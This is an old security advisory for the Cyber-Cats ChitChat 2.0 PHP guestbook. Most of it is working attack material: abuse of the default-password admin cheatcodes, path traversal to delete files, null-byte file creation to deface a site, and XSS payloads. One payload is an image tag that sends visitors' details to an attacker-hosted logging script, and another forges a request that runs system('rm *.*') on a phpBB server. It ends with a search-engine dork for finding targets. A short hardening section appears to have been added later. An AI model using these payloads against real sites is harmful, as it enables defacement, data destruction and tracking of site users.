Cyber-Cats ChitChat 2.0 permits cross-site scripting attacks,
lets users launch exploits from it, lets remote users obtain information
on target users, and allows insecure file deletion/creation

software:
site: http://www.cyber-cats.com/php/


1) this software uses a system of cheatcodes (they are well explained inside the
chitchat.php code) to administer the guestbook; you can use them in the message body.
The problem is the default password "admin", so you can use these commands:

command::admin::change password::[new password]

command::admin::delete::[an archive filename without extension]
(archives are organized by date; today is 04/09/2005, so if the admin chose
year-month-day archiving, the current filename is 050904.txt)

command::admin::add ip::[ip address]
(to add an ip to ban list)

command::admin::remove ip::[ip address]

command::admin::list ips::

command::admin::add word::[a word]
(to add a word to censored list)

command::admin::remove word::[a word]
command::admin::list words

so a user can easily change the password. It is one-way encrypted, so an admin
has to reinstall the board or change it in passwd.txt; you can use this to encrypt
a new password:

<?php
// Hash the replacement password with crypt() using the two-character salt "MW".
// The original snippet passed the bare word MW (an undefined constant) and
// discarded crypt()'s return value, so it printed the plaintext instead of the hash.
$apassword = 'newpassword';
$hash = crypt($apassword, 'MW');
echo $hash;
?>

2) archive filenames are not well filtered when you use the delete cheatcode, so
you can traverse directories:

command::admin::delete::../../[some_textfilename_without_extension]

(you cannot change the .txt extension...)

example, to delete the data.txt file:
command::admin::delete::../data


3) insecure file creation:
you cannot overwrite files, but you can create an empty file anywhere on the system with
the extension you want, using a null char:

http://[target]/chitchat/chitchat_mainpage.php?archive_file=../../../index.html%00

if the site's main page is an index.php, you have defaced it
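Both 2) and 3) come from the same root cause: a user-supplied archive name is concatenated into a path with no validation. The following is an added example, not ChitChat's own code, of how that parameter could be checked; the function names, the $archiveDir parameter and the six-digit YYMMDD rule are assumptions drawn from the naming scheme described above.

```php
<?php
// Added example, not code from ChitChat: validation for an archive-name
// parameter before it becomes a path. Function names, $archiveDir and the
// YYMMDD-only rule are assumptions drawn from the advisory's description.

// The vulnerable shape as the advisory describes it: the user-supplied name is
// glued between the archive directory and ".txt" with no filtering, so
// "../data" escapes the directory and a null byte truncates the name on old PHP.
function unsafe_archive_path(string $archiveDir, string $name): string
{
    return $archiveDir . '/' . $name . '.txt';
}

// Hardened: the archive scheme is a six-digit date (e.g. 050904), so accept
// exactly that and nothing else. \A and \z anchor the whole string, which also
// rejects embedded NUL bytes, slashes and dot segments.
function archive_name_is_valid(string $name): bool
{
    return preg_match('/\A[0-9]{6}\z/', $name) === 1;
}

// Returns the path to use, or null when the name must be refused. Resolving the
// directory with realpath() is defence in depth; the regex alone already makes
// traversal and extension changes impossible.
function safe_archive_path(string $archiveDir, string $name): ?string
{
    if (!archive_name_is_valid($name)) {
        return null;
    }
    $realDir = realpath($archiveDir);
    if ($realDir === false || !is_dir($realDir)) {
        return null;
    }
    return $realDir . DIRECTORY_SEPARATOR . $name . '.txt';
}

// Constructed inputs modelled on the advisory's own payloads.
$dir = sys_get_temp_dir();
foreach (['050904', '../data', "../../../index.html\0", '050904.txt'] as $name) {
    $verdict = safe_archive_path($dir, $name) === null ? 'REJECTED' : 'accepted';
    printf("%-28s %s\n", addcslashes($name, "\0"), $verdict);
}
```

The same validator should sit in front of every place the name is used (the delete cheatcode and the archive_file parameter alike), since filtering only one entry point leaves the other open.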


4) cross site scripting:

in the website field type:

"><script>alert("lol")</script>

so a user can log guestbook activity, for example:

"><img src="http://[evil_server]/script.php">

where script.php is:

<?php
 // append one line per request to a per-day log file
 // ($_SERVER is used instead of the register_globals variables of the original)
 $log = "log" . date("Ymd") . ".txt";
 $fp = fopen($log, 'a');
 fputs($fp, $_SERVER['REMOTE_ADDR'] . ":" . $_SERVER['REMOTE_PORT'] . " - "
    . $_SERVER['HTTP_USER_AGENT'] . "-" . $_SERVER['HTTP_REFERER'] . "-"
    . $_SERVER['REQUEST_METHOD'] . "-" . $_SERVER['QUERY_STRING'] . "-"
    . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . "-" . $_SERVER['REQUEST_URI'] . "\r\n");
 fclose($fp);
?>

also a user can make other users launch an exploit for him, for example against an old phpBB:

"><img src="http://[vulnerable_server]/phpBB/t=1&highlight='.system('rm *.*').'">

when a user opens the page, he launches the exploit URL as a GET request

googledorks: inurl:chitchat.php "choose graphic"

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it